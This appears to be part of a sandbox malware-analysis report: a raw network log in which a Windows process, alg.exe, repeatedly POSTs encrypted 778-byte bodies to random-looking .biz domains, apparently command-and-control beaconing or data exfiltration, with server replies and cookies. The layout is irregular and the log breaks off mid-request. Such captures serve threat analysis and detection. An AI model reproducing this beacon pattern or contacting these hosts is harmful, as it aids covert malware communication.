Oct 28, 2024 16:38:46.185539961 CET | 345 | OUT | POST /gcp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:46.185564995 CET | 778 | OUT | Data Raw: c2 65 15 68 b6 ac 1e f8 fe 02 00 00 22 24 47 a2 62 35 55 c5 fd 6d 7d 00 47 6c 23 5e 72 04 79 b9 5f e3 b6 ce f5 5d ea 94 4a 08 6f 9c 61 f8 2b 67 30 9d 61 7c 63 02 6b 31 3f f0 6b 24 77 c8 64 46 40 f0 88 46 14 5a 3d ce 22 19 fc c0 ab af 84 0d 49 99
Data Ascii: eh"$Gb5Um}Gl#^ry_]Joa+g0a|ck1?k$wdF@FZ="I&H}uK)$d5k)sf"fAmdqd4kC[X>)7T#)+7BO^zU-UiC`b*SU[t~WSK`\:e2q`Je.{8fN{V0x^
Oct 28, 2024 16:38:47.623069048 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5017ff9ab6e2fb30b0908190f7b96481|155.94.241.188|1730129927|1730129927|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50041 | 208.100.26.245 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:47.644360065 CET | 349 | OUT | POST /aucs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:47.644376040 CET | 778 | OUT | Data Raw: 93 6b cc 63 1f 52 ae 2f fe 02 00 00 aa 22 12 53 d7 22 34 c7 04 4d ab fe d5 d2 4d ff d7 e5 85 01 1a 64 27 97 6f b9 cf 01 f1 0a 97 79 aa fe 9b a8 52 73 4a d8 d7 c5 95 bb ad 4c a9 3b cf b2 56 34 18 1b 73 4f d4 b6 c5 bc 22 ed 40 26 75 72 c0 24 3e 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kcR/"S"4MMd'oyRsJL;V4sO"@&ur$>rFI#M6C5O4v:OaY=:IpDr>cb-k \WpHd8[.6Gl&ts8XHR<<(6+)l,MLdIw[RXo/;X
Oct 28, 2024 16:38:49.338663101 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:38:49.342329979 CET | 354 | OUT | POST /yvsxvdpyb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:49.342377901 CET | 778 | OUT | Data Raw: cc b1 47 a6 51 6e 6e 58 fe 02 00 00 83 bf 8f 4a ef 6f 74 e8 27 ec e1 79 95 9d f6 b8 0b cb d9 fc 56 63 7b cc e4 83 a4 2d cc c4 d0 ca dc bb 32 f5 c9 22 dc 69 09 80 c9 14 bb 9e c1 81 18 cf 86 ba d5 9b 70 e3 1b 8c 75 d3 cb 7e b9 18 39 b8 8f fc 84 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GQnnXJot'yVc{-2"ipu~9B0t2vO4*<5u7B#+rC:1n)ys+>y$BTb{HZ@g6s$2.;YG'{/fO4FGt9PA+Nxvp(
Oct 28, 2024 16:38:49.486805916 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50052 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:49.508557081 CET | 345 | OUT | POST /iq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:49.508579969 CET | 778 | OUT | Data Raw: 15 e7 9f 1a 32 02 35 e3 fe 02 00 00 2c 80 4a da 0b 7f 28 79 da 8e 33 d9 6d 43 79 47 98 00 b8 59 b1 16 70 49 9f bf da f1 83 80 fb cf 6b 3e 62 93 e9 5b 39 bf 7c 0f 91 d7 b7 6e 0a 34 1e 63 cb 46 f3 60 38 96 d3 44 3b b7 d8 12 a2 18 35 fa d2 f8 f9 ef
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 25,J(y3mCyGYpIk>b[9|n4cF`8D;5oyE2)2w-z#N\cL~E_"22rqp/P9P9k&W%3`hD<(a$~?Xs=*s3Z=(_I4mY6}hsF/}j|
Oct 28, 2024 16:38:50.453974009 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4425a3538f13a832d1abd26472e6f75a|155.94.241.188|1730129930|1730129930|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
Oct 28, 2024 16:38:50.457695007 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4425a3538f13a832d1abd26472e6f75a|155.94.241.188|1730129930|1730129930|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50057 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:50.485996962 CET | 352 | OUT | POST /tqiopufncd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.486031055 CET778OUTData Raw: b9 b8 e3 60 9e af 4b 7b fe 02 00 00 db e9 e1 5e 04 88 8c 14 44 4a 10 8f dc 95 50 1c e0 8b c5 65 e2 a3 ac 7c a4 fd 61 ac ad cd 80 2d da f6 9d 08 6a 05 50 ac 24 90 8f 25 a0 98 f0 8c 26 2a 27 b0 b8 f9 d4 b6 f2 cd 8c 93 3c 6d f1 c5 b5 a8 e9 fd 43 ed
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: `K{^DJPe|a-jP$%&*'<mCiQw5uq<36[}XGD8ovl(KP}1Uy"@RT-_m{QixiS]y@{LN/T$wc!>{t9gwRl?{n
Oct 28, 2024 16:38:51.313765049 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d32f7546153f0d8c2bd8b5d70e2ffcc0|155.94.241.188|1730129931|1730129931|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50062 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:51.337209940 CET | 347 | OUT | POST /fv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337222099 CET778OUTData Raw: f5 57 e0 65 ea d2 a2 c8 fe 02 00 00 f6 ca 11 d0 6e 09 cc 4d 62 98 8a 1a 08 43 00 0c 37 97 75 25 53 f4 2e ab 04 18 f8 f5 b5 32 b3 b6 4d bf 77 88 6b 17 e4 8a 7b 64 d3 4d e9 b3 8a 02 cd d9 65 0e 0c 8d 2e 9e ef 79 a1 ed d9 2d 25 5d 87 e2 0f a5 ad b4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: WenMbC7u%S.2Mwk{dMe.y-%]f-gujt^OV?7:)+"em$,a~V3A@Ab1vOn I~MElTE&lptIqk/=<8?/3^@4XqwIE7
Oct 28, 2024 16:38:51.992820024 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=161b0732f45e0a405f891efa0cb20c0f|155.94.241.188|1730129931|1730129931|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50068 | 3.254.94.185 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:52.119317055 CET | 346 | OUT | POST /cly HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119709969 CET778OUTData Raw: 7f 33 80 0b 02 88 24 73 fe 02 00 00 d6 c3 6c b1 e6 b7 85 72 84 bb 9e 59 b3 5b db be ab 98 65 73 15 fa 10 34 0f 64 65 db bd 90 e1 ad 1d df 6e 24 f2 45 87 4b 3d d7 2a 3c 48 38 bb ef 51 4d 63 e7 00 6f ed 95 f1 a1 f2 a4 1d d3 93 dc a5 fc 25 8d ab 1a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3$slrY[es4den$EK=*<H8QMco%tFp;O*;uf<>{aR e7Z~1{=-`Av<mN%*}'f|n>?XZ_R\x|%$,C:U[(!/@q8dY6
Oct 28, 2024 16:38:53.084430933 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0134dca36b22c34b826b96b499252ed9|155.94.241.188|1730129932|1730129932|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50074 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:53.209602118 CET | 357 | OUT | POST /rsijdbfgctvawkab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:54.043091059 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f01c7e18338592f47a0c5df14f801896|155.94.241.188|1730129933|1730129933|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
81          192.168.2.4  50080        54.244.188.177  80                6732  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:54.068969965 CET  343  OUT  POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:54.908963919 CET  414  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ee72b2519f7f117a458e5e6365f5ea98|155.94.241.188|1730129934|1730129934|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
82          192.168.2.4  50084        18.246.231.120  80                6732  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:54.932168007 CET  346  OUT  POST /myqrw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:55.755356073 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ffee5ed3507287c25aaafbb5eae8d2b9|155.94.241.188|1730129935|1730129935|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
83          192.168.2.4  50085        18.208.156.248  80                6732  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:38:55.781877995 CET  346  OUT  POST /bf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:56.442166090 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=505aa72a51f3e6007ee0d2fda055c7ea|155.94.241.188|1730129936|1730129936|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50086 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:56.556308031 CET | 357 | OUT | POST /oluilwxotdxeiqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:56.556386948 CET | 778 | OUT | Data Raw: 8e f2 eb 81 6d 0b ba 07 fe 02 00 00 4b 6d ce a3 31 85 62 e8 ec 71 1c 61 21 16 7b fb 55 48 6f 8f 22 58 07 8e 08 5f 3a 6d 49 bb 91 33 1d ce 15 9c 07 91 2f 20 38 3b 5c d1 76 44 14 20 21 d1 df 1d 0e a9 6c 29 55 5e 1e 3f d8 7c 11 a5 ae a9 c9 bd d5 37
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mKm1bqa!{UHo"X_:mI3/ 8;\vD !l)U^?|7lR6.ogw@kH^*0#<Dvua5(0iI+py>`7j=OwTK>Q2L4B8`BCes@(1uWU$i%G%$|
Oct 28, 2024 16:38:57.232316017 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2cae760ef4d2a471e7feb9e0412b2411|155.94.241.188|1730129937|1730129937|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50087 | 72.52.178.23 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:57.278640032 CET | 352 | OUT | POST /ajifdwkq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:57.278656006 CET | 778 | OUT | Data Raw: b7 de 56 94 96 4b 2d f0 fe 02 00 00 19 d7 8d c3 ad 16 2c 6f 53 35 8d 94 44 38 bf 63 c0 ee 7a de 83 c6 bc ca 4f 3b f4 e4 7a 06 32 96 8b a0 62 c9 dc 6a 2a c7 b7 b3 d0 82 16 c5 b8 9f de 98 74 7c cb fc 63 7b 28 5b f8 c3 80 03 f6 7e 26 96 bf a4 ab f8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: VK-,oS5D8czO;z2bj*t|c{([~&lK\8>+si8uKUw*]=H!!:V8`1(@!P%hK\eW1c3f}g3'c6R|NN:^w7g'1D!,f&gkr'Z1CH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50088 | 72.52.178.23 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:57.969413042 CET | 354 | OUT | POST /exoigpwxtw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
